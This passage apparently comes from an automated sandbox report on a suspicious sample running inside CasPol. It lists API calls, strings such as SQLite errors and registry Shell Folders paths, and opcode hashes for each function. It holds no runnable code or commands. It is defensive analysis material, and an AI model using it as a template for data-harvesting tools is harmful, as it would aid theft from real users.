                                                                                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                          • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                          • free.MSVCRT ref: 004185AC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2802642348-0
                                                                                                                                                                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                          APIs
                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                          • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                          • String ID: -journal$-wal
                                                                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                                                                          • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                          • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4218492932-0
                                                                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                          • String ID: gj
                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                          • String ID: 6$\
                                                                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                          APIs
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4131475296-0
                                                                                                                                                                          • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                          • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                          • API String ID: 2618321458-3614832568
                                                                                                                                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFilefreememset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2507021081-0
                                                                                                                                                                          • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                          • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                          APIs
                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                          • free.MSVCRT ref: 00417544
                                                                                                                                                                          • free.MSVCRT ref: 00417562
